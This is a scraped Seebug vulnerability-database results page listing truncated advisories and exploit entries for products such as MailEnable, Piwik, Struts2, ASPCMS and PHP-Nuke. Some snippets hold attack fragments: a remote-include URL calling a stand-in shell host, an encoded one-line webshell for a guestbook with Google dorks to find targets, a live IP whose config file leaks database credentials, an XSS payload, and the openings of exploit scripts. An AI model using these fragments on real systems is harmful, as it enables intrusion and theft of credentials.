Lucene search
+L
SeebugMost viewed

56796 matches found

seebug.org
seebug.org
added 2006/11/29 12:00 a.m.181 views

MailEnable WebAdmin绕过认证漏洞

MailEnable是一款商业性质的POP3和SMTP服务器。 MailEnable的WebAdmin登录进程实现上存在安全漏洞,攻击者可能利用此漏洞无需口令便可成功登录,获得非授权访问。 MailEnable MailEnable Professional Edition 2.32 MailEnable MailEnable Enterprise Edition 2.32 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.mailenable.com/hotfix/ME-10019.ZIP...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2006/09/03 12:00 a.m.181 views

yappa-ng <= 2.3.1 (admin_modules) Remote File Include Vulnerability

No description provided by source. ============================================================================================== yappa-ng = v2.3.1 adminmodules Remote File Inclusion Exploit =============================================================================================== Critical...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2016/09/09 12:00 a.m.180 views

泛微 OA /js/swfupload/swfupload.swf xss漏洞

No description provided by source...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2015/09/23 12:00 a.m.180 views

QiboCMS V7 do/job.php 任意文件下载漏洞

1.漏洞分析 /inc/job/download.php $url=trimbase64decode$url; $fileurl=strreplace$webdbwwwurl,"",$url; if eregi".php",$fileurl && isfileROOTPATH."$fileurl" die"ERR"; if!$webdbDownLoadreadfile $fileurl=strstr$url,"://"?$url:tempdir$fileurl; header"location:$fileurl"; exit; $webdbupfileType = strreplace'...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2009/12/25 12:00 a.m.180 views

Piwik ofc_upload_image.php远程PHP代码执行漏洞

BUGTRAQ ID: 37314 CVECAN ID: CVE-2009-4140 Piwik是一款利用Php+MySQL技术构建的开源网页访问统计系统。 Piwik中使用了open-flash-chart模块执行制表操作,该模块没有正确的过滤提交给ofcuploadimage.php文件的name和HTTPRAWPOSTDATA参数便用于创建文件: ? $defaultpath = '../tmp-upload-images/'; if !fileexists$defaultpath mkdir$defaultpath, 0777, true; $destination =...

7.5CVSS6.5AI score0.75838EPSS
SaveExploits15
seebug.org
seebug.org
added 2008/01/26 12:00 a.m.180 views

flinx <= 1.3 (category.php id) Remote SQL Injection Vulnerability

No description provided by source. -------------------------------------------------------------- H-T Team HouSSaMix + ToXiC350 + RxH -------------------------------------------------------------- Author : Houssamix From H-T Team Script : flinx 1.3 & below Download :...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2021/05/20 12:00 a.m.179 views

Cisco HyperFlex HX 未授权命令注入漏洞(CVE-2021-1497 CVE-2021-1498)

CVE-2021-1497 and/or CVE-2021-1498 Command injection in the /storfs-asup endpoint’s token and mode parameters. Patch --- unpatched/web.xml 2021-05-17 19:06:17.000000000 -0500 +++ patched/web.xml 2021-05-17 19:06:23.000000000 -0500 @@ -69,17 +69,6 @@ - Springpath Storfs ASUP -...

10CVSS0.1AI score0.99999EPSS
SaveExploits5
seebug.org
seebug.org
added 2015/10/10 12:00 a.m.179 views

极通 EWEBS 应用虚拟化系统信息泄露漏洞

No description provided by source...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2012/05/03 12:00 a.m.179 views

ASPCMS留言板插马

简要描述: 朋友丢来一个程序,看着看着就发现了一个漏洞,ASPCMS最新版本直接拿shell,应该很多人早就发现了。 详细说明: google关键字:powered by ASPCMS 大概有几十页网站,基本上都可以拿下,aspcms主要是信息发布系统,影响版本为asp。漏洞成因,在留言板处对信息处理不当,导致代码注入。可直接将一句话木马插入数据库。 数据库默认配置为asp.目录在/data/data.asp下。 利用方法,保证默认数据库路径末更改及可留言,就算不能留言,可构造,经测试,九成的末更改: 在留言的标题处插入:┼攠數畣整爠煥敵瑳∨≡┩愾 这样就往数据库中插入了一句话,密码为a...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2009/03/06 12:00 a.m.179 views

Multiple Vendors libc:fts_*() Local Denial of Service Exploit

No description provided by source. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 libc:fts:multiple vendors, Denial-of-service Author: Maksymilian Arciemowicz SecurityReason.com Date: - - Dis.: 21.10.2008 - - Pub.: 04.03.2009 CVE: CVE-2009-0537 We are going informing all vendors, about this proble...

4.9CVSS6.4AI score0.03592EPSS
SaveExploits6
seebug.org
seebug.org
added 2008/01/08 12:00 a.m.179 views

Jetty双斜线URI处理信息泄露漏洞

BUGTRAQ ID: 27117 Jetty是一款流行的Java Web服务器。 Jetty处理用户请求时存在漏洞,远程攻击者可能利用此漏洞绕过访问验证获取敏感信息。 如果未经认证的远程攻击者向Jetty服务器提交了包含有两个斜线字符(/)的特制URI请求的话,就可以查看隐藏的或保密的文件和目录。 Jetty Jetty 6.1.6 Jetty Jetty 6.1.5 Jetty ----- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://docs.codehaus.org/display/JETTY/Downloading+and+Installin...

6.9AI score
SaveExploits0
seebug.org
seebug.org
added 2021/04/16 12:00 a.m.178 views

eyouCMS RCE漏洞

...

0.9AI score
SaveExploits0
seebug.org
seebug.org
added 2017/03/20 12:00 a.m.178 views

FFmpeg Heap Overflow vulnerability (CVE-2016-10190)

作者:bird@tsrc 1. 前言 FFmpeg是一个著名的处理音视频的开源项目,使用者众多。2016年末paulcher发现FFmpeg三个堆溢出漏洞分别为CVE-2016-10190、CVE-2016-10191以及CVE-2016-10192。本文详细分析了CVE-2016-10190,是二进制安全入门学习堆溢出一个不错的案例。 调试环境: 1. FFmpeg版本:3.2.1按照https://trac.ffmpeg.org/wiki/CompilationGuide/Ubuntu1编译 2. 操作系统:Ubuntu 16.04 x64 2. 漏洞分析...

7.5CVSS9.2AI score0.08359EPSS
SaveExploits1
seebug.org
seebug.org
added 2016/09/14 12:00 a.m.178 views

Atlassian Confluence arbitrary file include Vulnerability (CVE-2015-8399)

Affect the Assembly: Atlassian Confluence Atlassian Confluence is less than 5. 8. 17 versions of the service exist in the arbitrary file read and directory traversal vulnerabilities /spaces/viewdefaultdecorator. action? decoratorName=. Lists the current directory /spaces/viewdefaultdecorator...

4CVSS5.4AI score0.60241EPSS
SaveExploits5
seebug.org
seebug.org
added 2009/12/16 12:00 a.m.178 views

Tomcat自带示例hello.jsp存在XSS跨站脚本漏洞

存在漏洞版本: Tomcat 4.0.0 to 4.0.6 Tomcat 4.1.0 to 4.1.36 Tomcat 5.0.0 to 5.0.30 Tomcat 5.5.0 to 5.5.23 Tomcat 6.0.0 to 6.0.10 漏洞描述: Tomcat 是一个服务端应用。其存在由于用户的非正常输入导致的危险. 远程的用户可以执行跨站脚本攻击. 远程的用户也可以植入 html 来挂马 webSPELL中自带的/sample/web/hello.jsp示例程序存在跨站脚本攻击漏洞,远程攻击者注入任意web脚本或HTML可以借助test参数执行任意的js代码。...

7AI score
SaveExploits0
seebug.org
seebug.org
added 2008/09/14 12:00 a.m.178 views

MySQL空两进制字符串远程拒绝服务漏洞

BUGTRAQ ID: 31081br / CVE ID:CVE-2008-3963br / CNCVE ID:CNCVE-20082358br / br / MySQL是一款开放源代码的数据库应用程序。br / MySQL处理空两进制值存在问题,远程攻击者可以利用漏洞使服务程序崩溃。br / 通过Mysql客户端提交如下查询:br / select b'';br / 可导致服务程序崩溃。br / MySQL AB MySQL 6.0.4 MySQL AB MySQL 5.1.23 MySQL AB MySQL 5.0.60 可升级到最新版本:...

4CVSS6.2AI score0.06465EPSS
SaveExploits2
seebug.org
seebug.org
added 2014/07/01 12:00 a.m.177 views

Struts2/XWork < 2.2.0 - Remote Command Execution Vulnerability

漏洞详情 在struts2中,DefaultActionMapper类支持以"action:"、"redirect:"、"redirectAction:"作为导航或是重定向前缀,但是这些前缀后面同时可以跟OGNL表达式,由于struts2没有对这些前缀做过滤,导致利用OGNL表达式调用java静态方法执行任意系统命令。 这里以“redirect:”前缀举例,struts2会将“redirect:”前缀后面的内容设置到redirect.location当中,这里我们一步步跟踪,首先是这个getMapping函数跟入 这里一直到这个handleSpecialParameters,继续跟入...

5CVSS0.5AI score0.92015EPSS
SaveExploits22
seebug.org
seebug.org
added 2009/12/15 12:00 a.m.177 views

PHP php_getuid 函数存在权限绕过漏洞

No description provided by source...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2009/06/13 12:00 a.m.177 views

Microsoft IIS 5.0 WebDAV绕过认证漏洞(MS09-020)

BUGTRAQ ID: 35232 CVECAN ID: CVE-2009-1122 Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 IIS的WebDAV扩展没有正确解码特制请求的URL,导致WebDAV在处理该请求时应用不正确的配置。如果应用的配置允许匿名访问,则特制的请求可以绕过身份验证。 请注意IIS在配置的匿名用户帐户的安全上下文中仍会处理该请求,因此此漏洞不能用于绕过NTFS ACL,文件系统ACL对匿名用户帐户强加的限制将仍然执行。 Microsoft IIS 5.0 临时解决方法...

7.6CVSS6.3AI score0.98447EPSS
SaveExploits6
seebug.org
seebug.org
added 2009/03/19 12:00 a.m.177 views

PostgreSQL转换编码远程拒绝服务漏洞

BUGTRAQ ID: 34090 CVECAN ID: CVE-2009-0922 PostgreSQL是一款高级对象-关系型数据库管理系统,支持扩展的SQL标准子集。 PostgreSQL处理转换编码时存在栈溢出漏洞,通过认证的用户可以通过提交特制的SQL查询请求在一段时间期间杀死到PostgreSQL服务器的连接,中断其他用户和客户端的事务处理。 PostgreSQL 8.3.6 厂商补丁: PostgreSQL ---------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.postgresql.org =cut=...

4CVSS7.5AI score0.10242EPSS
SaveExploits3
seebug.org
seebug.org
added 2007/09/20 12:00 a.m.177 views

VMware Workstation 6.0多个安全漏洞

BUGTRAQ ID: 25728,25729,25731,25732 CVECAN ID: CVE-2007-0061,CVE-2007-0062,CVE-2007-0063,CVE-2007-4059,CVE-2007-4155,CVE-2007-4496,CVE-2007-4497 VMWare是一款虚拟PC软件,允许在一台机器上同时运行两个或多个Windows、DOS、LINUX系统。 VMWare的实现上存在多个安全漏洞,可导致多种威胁。 具体如下: 1 VMWare的DHCP服务器可被恶意网页用来获取系统权限。 2...

10CVSS6.4AI score0.20413EPSS
SaveExploits4
seebug.org
seebug.org
added 2007/08/08 12:00 a.m.177 views

WordPress WP-FeedStats HTML注入漏洞

WordPress是一款基于WEB的网络日记程序。 WordPress不正确过滤用户提的输入,远程攻击者可以利用漏洞进行HTML注入攻击,获得敏感信息。 问题是'WP-FeedStats'脚本对用户提交的WEB参数缺少过滤,提交恶意脚本代码作为参数数据,并诱使用户访问,可获得目标用户敏感信息。 WP-FeedStats 2.1 目前没有解决方案提供: http://bueltge.de/wp-feedstats-de-plugin/171/ http://www.example.com/wp1/?feed=rss2&scriptalert1/script...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2006/08/17 12:00 a.m.177 views

Mambo phpShop Component &lt;= 1.2 RC2b File Include Vulnerability

No description provided by source. Affected Application: Mambo phpShop v1.2 RC2b Mambo CMS Component . . : contact : . . . . . . . . . . . . . . . . . . . . . . . . . . . Discoverd/Found by: Charles Nelwan a.k.a Cmaster4 Team: BatamHacker irc.dal.net crew URL: http://www.batamhacker.info/forum...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2015/10/10 12:00 a.m.176 views

用友致远A6协同管理系统resend.jsp SQL注入漏洞

北京致远协创软件有限公司的致远软件连续10年获得中国协同管理软件市场占有率第一(CCID),连续6年获得中国协同软件用户满意度第一(CCW),被中国软件行业协会评为中国软件行业领军企业,是中国协同管理软件的开创者和领导者。 公司与Oracle、SAP、IBM、Microsoft、Samsung、用友、华为、中国移动、中国联通、中国电信等国内外知名企业形成长期战略合作关系。目前公司拥有1500多家合作伙伴,3000多名伙伴顾问,随时随地为客户提供全方位服务。致远协同管理软件已经拥有30000家企业级客户,每天有超过400万终端用户使用致远协同管理软件产品与服务。...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2014/07/01 12:00 a.m.176 views

PHP CGI Argument Injection Exploit

No description provided by source. Exploit Title: Cve-2012-1823 PHP CGI Argument Injection Exploit Date: May 4, 2012 Author: rayh4c0x4080sec0x2ecom Exploit Discovered by wofeiwo0x4080sec0x2ecom import socket import sys def cgiexploit: pwncode = ?php phpinfo;? postLength = lenpwncode httpraw=POST...

7.5CVSS0.4AI score0.99998EPSS
SaveExploits46
seebug.org
seebug.org
added 2014/07/01 12:00 a.m.176 views

jetty 6.x - 7.x xss, information disclosure, injection

No description provided by source. Jetty 6.x and 7.x Multiple Vulnerabilities Name Multiple Vulnerabilities in Jetty Systems Affected Jetty 7.0.0 and earlier versions Severity Medium Impact CVSSv2 Medium 5/10, vector: AV:N/AC:L/Au:N/C:P/I:N/A:N Vendor http://www.mortbay.org/jetty/ Advisory...

5CVSS7.7AI score0.17413EPSS
SaveExploits8
seebug.org
seebug.org
added 2013/12/27 12:00 a.m.176 views

TP-LINK /userRpmNatDebugRpm26525557/linux_cmdline.html 后门漏洞

No description provided by source...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2009/12/25 12:00 a.m.176 views

Discuz! 6.0.0&6.1.0 spache.php SQL注入漏洞

No description provided by source...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2008/07/17 12:00 a.m.176 views

AIX &lt;= 5.3.0 (invscout) Local Command Execution Vulnerability

No description provided by source. !/usr/bin/sh r00t exploit written for the invscout bug reported by Idefense labs http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities coded by ri0t exploitation is trivial but automated with this script www.ri0tnet.net usage ./getr00t.sh :...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2006/08/24 12:00 a.m.176 views

phpCOIN 1.2.3 (session_set.php) Remote Include Vulnerability

No description provided by source. phpCOIN 1.2.3 CCFGPKGPATHINCL Remote Include Vulnerability Discovered by: Timq http://www.securitydb.org Email: timqathackernetworkdotcom http://www.securitydb.org Vulnerable: requireonce include $CCFG'PKGPATHINCL'.'redirect.php'; Exploit PoC:...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2017/05/26 12:00 a.m.175 views

Code Injection through DLL Sideloading in 64bit Oracle Java(CVE-2017-3511)

This blog post is about a DLL sideloading vulnerability in the 64bit Windows version of Oracle Java. It allows any local user to inject code in Java processes of other users. At the time of writing it has been verified with the latest stable 64bit Java version 1.8.0101 on both a fully patched...

3.7CVSS8AI score0.00759EPSS
SaveExploits2
seebug.org
seebug.org
added 2015/09/06 12:00 a.m.175 views

WordPress CP Multi View Event Calendar Plugin 1.1.7 - SQL Injection

Exploit Title: WordPress cp-multi-view-calendar.1.1.7 Unauthenticated SQL injection vulnerabilities Date: 2015-07-10 Google Dork: Index of /wordpress/wp-content/plugins/cp-multi-view-calendar Vendor Homepage: http://wordpress.dwbooster.com/ Software Link:...

8.2AI score
SaveExploits0
seebug.org
seebug.org
added 2015/08/28 12:00 a.m.175 views

Raonet Subscriber Ethernet Router MySQL 数据库账户密码泄露

Raonet SER-500 路由器 MySQL 账户密码泄漏, 可远程登录, 高权限. 验证地址: http://61.77.63.86/inc/conndb.inc Google dork: intitle:Raonet Subscriber Ethernet Router !/usr/bin/env python import urlparse import re import urllib2 def assignservice, arg: if service != "www": return arr = urlparse.urlparsearg return True,...

7AI score
SaveExploits0
seebug.org
seebug.org
added 2015/01/23 12:00 a.m.175 views

Discuz X2.5 /source/class/class_image.php 命令执行漏洞

/source/module/aforum/forumimage.php $nocache = !empty$GET'nocache' ? : ; $daid = intval$GET'aid'; $type = !empty$GET'type' ? $GET'type' : 'fixwr'; list$w, $h = explode'x', $GET'size'; $dw = intval$w; $dh = intval$h; $thumbfile = 'image/'.$daid.''.$dw.''.$dh.'.jpg'; $parse =...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2014/07/01 12:00 a.m.175 views

Mercury/32 <= 4.01b - LOGIN Buffer Overflow

No description provided by source. $Id: mercurylogin.rb 9583 2010-06-22 19:11:05Z todb $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2014/07/01 12:00 a.m.175 views

BinGo News <= 3.01 (bnrep) Remote File Include Vulnerability

在文件bpncom.php中,未对包含对象参数bnrep做过滤导致远程文件包含漏洞,代码如下 include $bnrep."bnconfigs.php"; 可导致远程文件包含如下: http://example.com/path/bpncom.php?bnrep=http://SHELLURL.COM...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2014/07/01 12:00 a.m.175 views

Debian 2.1,Linux kernel 2.0.x,RedHat 5.2 Packet Length with Options Vulnerability

No description provided by source. / source: http://www.securityfocus.com/bid/870/info Debian 2.1,Linux kernel 2.0.34/2.0.35/2.0.36/2.0.37/2.0.38,RedHat 5.2 i386 Packet Length with Options Vulnerability A vulnerability in the Linux kernel's TCP/IP allows local users to crash, hang or corrupt the...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2014/07/01 12:00 a.m.175 views

BSD/OS 2.1/3.0,Larry Wall Perl 5.0 03,RedHat 4.0/4.1,SGI Freeware 1.0/2.0 suidperl Overflow(1)

No description provided by source. source: http://www.securityfocus.com/bid/708/info Several buffer overflows were found in the Perl helper application 'suidperl' or 'sperl'. When this program is installed setuid root the overflows may lead to a local root compromise. !/usr/bin/perl yes, this...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2013/07/19 12:00 a.m.175 views

用友某产品Struts命令执行漏洞(可导致金融、保险、基金等行业用户受到影响)

简要描述: 用友客服系统某产品命令执行漏洞(涉及金融、保险、基金等行业用户) 详细说明: 用友的客服系统存在最新的struts命令执行漏洞 涉及金融、保险、基金等行业用户 中国大地保险...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2012/06/06 12:00 a.m.175 views

PostgreSQL 'SECURITY DEFINER'和'SET'属性远程拒绝服务漏洞

BUGTRAQ ID: 53812 CVE ID: CVE-2012-2655 PostgreSQL是一款高级对象-关系型数据库管理系统,支持扩展的SQL标准子集。 PostgreSQL在ALTER FUNCTION RENAME的实现上存在远程拒绝服务漏洞,利用此漏洞可允许攻击者使应用崩溃。 0 PostgreSQL 9.x PostgreSQL 8.x 厂商补丁: PostgreSQL ---------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.postgresql.org...

4CVSS0.4AI score0.0293EPSS
SaveExploits1
seebug.org
seebug.org
added 2017/04/04 12:00 a.m.174 views

macOS/IOS: mach_msg doesn't copy memory in a certain case(CVE-2017-2456)

When sending ool memory via |machmsg| with |deallocate| flag or |MACHMSGVIRTUALCOPY| flag, |machmsg| performs moving the memory to the destination process instead of copying it. But it doesn't consider the memory entry object that could resurrect the moved memory. As a result, it could lead to a...

7.6CVSS8.4AI score0.04244EPSS
SaveExploits4
seebug.org
seebug.org
added 2016/01/20 12:00 a.m.174 views

泛微OA系统日志泄露漏洞

No description provided by source...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2014/07/01 12:00 a.m.174 views

W-Agora 4.1.6 a redir_url.php key Parameter SQL Injection

No description provided by source. source: http://www.securityfocus.com/bid/11283/info Multiple vulnerabilities are reported to affect the application. These issues arise due to insufficient sanitization of user-supplied data. A remote attacker may leverage these vulnerabilities to carry out SQL...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2014/07/01 12:00 a.m.174 views

PhpMyAdmin Config File Code Injection

漏洞位置在scripts/setup.php 1315行开始: case 'save': $config = @fopen'./config/config.inc.php', 'w'; //以写的方式打开 if $config === FALSE message'error', 'Could not open config file for writing! Bad permissions?'; break; $s = getcfgstring$configuration; //$configuration = unserialize$POST'configuration'; $r =...

7.5CVSS9.6AI score0.96565EPSS
SaveExploits17
seebug.org
seebug.org
added 2006/07/10 12:00 a.m.174 views

SQuery &lt;= 4.5 (gore.php) Remote File Inclusion Vulnerability

No description provided by source. ================================================================= SQuery = 4.5libpath Remote File Inclusion Exploit ================================================================= Worked On : ALL VERSIONS | | Critical Level : Dangerous | | Gug Found In :...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2021/07/06 12:00 a.m.173 views

KGUARD DVR 未授权命令执行漏洞

...

1.2AI score
SaveExploits0
seebug.org
seebug.org
added 2014/07/01 12:00 a.m.173 views

YeaLink IP Phone Firmware <= 9.70.0.100 - Unauthenticated Phone Call Vulnerability

No description provided by source. Exploit Title: YeaLink IP Phone SIP-TxxP firmware =9.70.0.100 phone call vulnerability Date: 05-28-2013 Exploit Author: b0hr franciscoatgarnelo.eu Vendor Homepage: http://yealink.com Software Link:...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2014/07/01 12:00 a.m.173 views

PHP-Nuke 7.0/8.1/8.1.35 - Wormable Remote Code Execution

No description provided by source. !/usr/bin/php ?php / Wormable Remote Code Execution in PHP-Nuke 7.0/8.1/8.1.35newist as of release Vendor's Website:http://phpnuke.org/ Secuirty Researcher: Michael Brooks https://sitewat.ch Original Advisory:...

7.5CVSS6.4AI score0.72096EPSS
SaveExploits14
seebug.org
seebug.org
added 2014/07/01 12:00 a.m.173 views

W-Agora 4.2.1 search.php search_user Parameter XSS

No description provided by source. source: http://www.securityfocus.com/bid/23057/info w-Agora is prone to multiple input-validation vulnerabilities, including possible SQL-injection issues and multiple cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2014/03/19 12:00 a.m.173 views

Joomla! FreiChat组件&quot;id&quot;跨站脚本漏洞

CVE ID:CVE-2013-5952 Joomla!是一款内容管理系统。 由于通过"id" GET参数传递到client/chat.php的输入在被返回用户前没有正确过滤,攻击者可以利用漏洞在受影响站点上下文的用户浏览器会话中执行任意HTML和脚本代码。 0 FreiChat 9.x component for Joomla! 目前没有详细解决方案提供: http://www.joomla.org...

4.3CVSS6.6AI score0.01864EPSS
SaveExploits3
Total number of security vulnerabilities5000